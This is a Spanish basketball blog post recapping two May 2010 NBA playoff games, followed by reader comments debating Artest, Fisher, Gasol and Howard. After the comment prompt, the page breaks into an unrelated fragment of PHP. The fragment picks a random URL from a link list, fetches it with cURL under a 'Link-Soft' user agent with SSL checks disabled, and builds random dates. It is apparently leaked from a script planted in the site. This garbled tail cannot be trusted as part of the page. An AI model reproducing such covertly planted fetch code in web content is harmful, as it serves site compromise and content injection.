Playoffs 08/05/2010: Invitado sorpresa

09 de May de 2010 por txusma

Se esperaba un partido duro en Salt Lake y damos fe que lo encontraron. No faltó ninguno de los invitados a la fiesta y a última hora se presentó uno con el que no se contaba. Estaban Pau, Bynum y Odom, pero esta vez los Lakers no impusieron su poderío interior para llevarse el partido. Estaba Deron Williams liderando nuevamente a su equipo pero fallando la que hubiera podido ser la canasta ganadora a falta de 4 segundos. Estaban también Fisher y Kobe anotando 2 triples decisivos en el último minuto. Incluso se habían presentado Kirilenko y Korver, que cuajó un gran partido desde el punto de vista anotador. Estaban todos y se lo estaban pasando bien, hasta que apareció ese jugador que sólo sirve para defender, que no mete un triple solo ni amenazado y que en esta serie no encontraba su sitio. Apareció Ron Artest, anotó 18 de sus 20 puntos en la segunda parte con 4 de 7 en triples, resultando clave en el aspecto ofensivo de la apretada victoria lakeriana. Quien lo iba a decir.

Y en Atlanta, se vivió una repetición del primer partido de la serie, aquel en que los Hawks se quedaron en el vestuario y no saltaron a la cancha. Los Magic maniataron a todos los jugadores de Atlanta a excepción, tal vez, de Crawford que fue el único que pudo volver con la cabeza alta a su casa. El resto deben de tener la cabeza ya en otro sitio. Brillante decepción.

Comenta

13 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Ni de coña fue Artest el hombre decisivo del partido, pero bueno es una discusión en la que no nos vamos a poner deacuerdo. Lo que no se puede negar es que si se acerca a este nivel de acierto para mi estamos un punto por encima del resto.

      Citar

  2. MagicJohnson32 dice:
    #2

    Fue un partido precioso, a los Lakers les costó entrar pero cuando lo hicieron resultó una batalla apasionante. El intercambio final, de escándalo. Ganaban los Jazz por 4 a menos de 3 minutos para el final cuando Odom apareció con 5 puntos seguidos. La secuencia siguió así: Anota Millsap, anota Kobe, triple de Korver, falla Artest, tiro libre de Matthews, triplazo de Kobe, canastón de Deron y triple brutal de Fish para poner a los Lakers por delante de forma definitiva.

    Grandioso Fisher, respondiendo a los gritos de “Fisher Sucks” con 20 puntos y otro triple para el recuerdo.

      Citar

  3. Txusma dice:
    #3

    Alguien ha dicho q Artest fuera decisivo? Clave sí pq finalmente aportó ofensivamente lo q mucha gente esperaba de él. Es cuestión de aprovechar los espacios que generan Kobe y Gasol a su alrededor.

      Citar

  4. NBA LAKERS BLOG dice:
    #4

    Buen resumen, como siempre. Artest fue clave, sí. Pero Fisher fue el jugador del partido. Es increíble como los Lakers saben sobrevivir aún cuando encuentran la horma de su zapato. Porque si Sloan hizo algo bien anoche, fue anular a Bynum, Gasol y Odom.

    Saludos.

    PM

      Citar

  5. Love Denise dice:
    #5

    Que apisinadora, que vendaval, Go Magic! sólo un Lebron sobrehumano con algo de ayuda pueden quitarnos el anillo. Ahhhh me dan miedo estos Cavs. Lástima la adquisición de Jamison por la cara. A Lakers los respeto pero no me dan miedo, aunque siempre están ahí dandonos quebraderos de cabeza.
    ¿Dónde están ahora los críticos de Howard????

      Citar

  6. kantonyo dice:
    #6

    Lo de criticos de Howard, no lo diras por mi, que siempre he dicho que era el mejor pívot de la liga, incluso cuando por aqui algunos le ponian por detras de Bogut.

    Yo lo que he dicho es que Gasol es mucho mejor que Howard, no olvides que aunque Howard lo está haciendo muy bien Gasol tb:

    Playoffs:

    Howard: 15,7 ptos – 11,7 reb – 3,86 tap
    Gasol: 18,8 ptos – 13,0 reb – 1.89 tap – 3.4 asi

      Citar

  7. Love Denise dice:
    #7

    No he dado nombres, si te das por aludido, tú mismo. nadie más que tú sabrá tus opiniones sobre Howard.

    No es noticia que gasol y howard sean buenísimos, ya dije un día que no veo lógico estar diciendo “quién es mejor gasol o howard”? de todas formas, en esta comparación, de nada sirve poner lso números de uno y de otro.
    Los Lakers han debido de forzarse al máximo para ganar sus partidos, habiendo jugado Gasol 7 minutos más de media que Howard, siendo la principal refencia en varias ocasiones de lakers, en cambio Howard apenas ha tenido que ser utilizado por los magic gracias a sus cómodos triunfos, y ha tirado menos de la mitad de tiros de campo que Pau; ha tirado más tiros libres, pero ahí sí que Howard está increiblemente mal. Comentar también que su margen de mejora es mayor al de Pau, el cual, creo que su rendimiento ya ha llegado al climax, al punto máximo, dificil es ver una version mejorada del catalan a la que está dando.
    Conclusión: que Howard se ha marcado un 16-12 sin sudar, sin apenas tirar y fallando tropecientos tiros libres

      Citar

  8. TheDeerHunter dice:
    #8

    sí, claro… las medias de minutos de Howard son por sus cómodos triunfos. No tiene nada que ver los problemas de faltas. Y ni siquiera ha sudado.

    Y los Lakers han tenido que sudar, porque sus rivales son muy buenos.
    Ya podían Hawks y Bobcats demostrar alguna cosita parecida a lo que sí han mostrado Thunder y Jazz.

      Citar

  9. Love Denise dice:
    #9

    Claro que Howard ha tenido problemas de faltas, en su mayor parte gracias a los arbitrajes duros hacia él.
    Ahora resulta que los hawks (3º del Este) y los Bobcats (que le han dado muchos problemas a Cavs en temporada regular) son unos mataos.
    Que bueno el duo Barnes & Pietrus, en especial Barnes, cómo este tipo puede cobrar tan “poco” para lo que cobran otros paquetes?
    Me encantan los jugadores sucios y marrulleros como Barnes, pero no violentos como Bowen y Artest; además en ataque tiene bastante calidad. Confío en Barnes & Pietrus como antídoto a Lebron y Kobe.

      Citar

  10. TheDeerHunter dice:
    #10

    No entro ni salgo en lo del tema de arbitrajes… si tú lo dices será cierto, supongo. Pero lo de que Orlando “ha administrado sus minutos” me parece un poco cogido por los pelos, por decir algo…
    Bobcats o Hawks han demostrado muy poquito estos playoffs y yo no creo que todo sea debido al “inalcanzable” nivel que ha mostrado Orlando. Han jugado bien, sí. Eso es todo.

    Me parece inaceptable que metas a Artest y Bowen en el mismo saco. Me parece todavía más inaceptable que compares la defensa de Artest y la de Barnes. Ni siquiera voy a tomarme la molestia de sacarte los números de Durant contra uno y otro…
    Sólo te digo que en toda la temporada puedes poner ni un pero la defensa de Artest en cuanto a limpieza/violencia. Y si no es así lo dices ahora o nos callamos hasta que haya algo que decir al respecto.
    Yo de Barnes sí tengo algunas puntualizaciones documentadas. Ya hemos hablado de ello.

    Ah… y lo de los antídotos contra Kobe ya hemos visto algunos intentos. Una de las muescas que tiene Kobe en su rifle está dedicada a Pietrus.

      Citar

  11. kantonyo dice:
    #11

    Me daba por aludido por que uno de los últimos debates con Howard era que yo lo definia por debajo de Gasol. Por eso he dejado claro que yo he defendido a Howard como el que más en el blog, antes de hacer el buen papel que esta haciendo en los playoffs, y lo he considerado durante toda la temporada como el mejor pivot de largo de la liga.

    Pero por muy bien que lo haga no lo está haciendo mejor que Gasol. Lo que dices de que Gasol ha tenido que jugar más minutos, es un punto para Gasol, ya me gustaría a mi ver a Howard contra Boozer-Millsap a ver que números hace.

    Y cuando dices que Gasol no va a mejorar, pq está en su climax…. es curioso pero esto lo llevo escuchando ya 10 años….. Algun día, no habrá mas remedio que se haga realidad.

      Citar

  12. Love Denise dice:
    #12

    Artest no ha protagonizado incidentes este año, pero en años anteriores ha protagonizado todo tipo de altercados, problemas y ha generado mucha violencia, para mí es un jugador potencialmente violento, y cuando a los Lakers les vaya mal, sacará sus malas artes a relucir.

    Kantonyo, pero si Gasol está a un nivel estratosférico, de verdad crees que puede mejorar todavía más?

      Citar

  13. TheDeerHunter dice:
    #13

    Eso es tanto como decir que Al Harrington o Stephen Jackson son potencialmente violentos.

    He visto más violencia en Pietrus (piñazo a Pau en el último partido del año pasado), Barnes (el último partido Orl-Lal) e incluso Pau Gasol que en Artest los últimos años.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>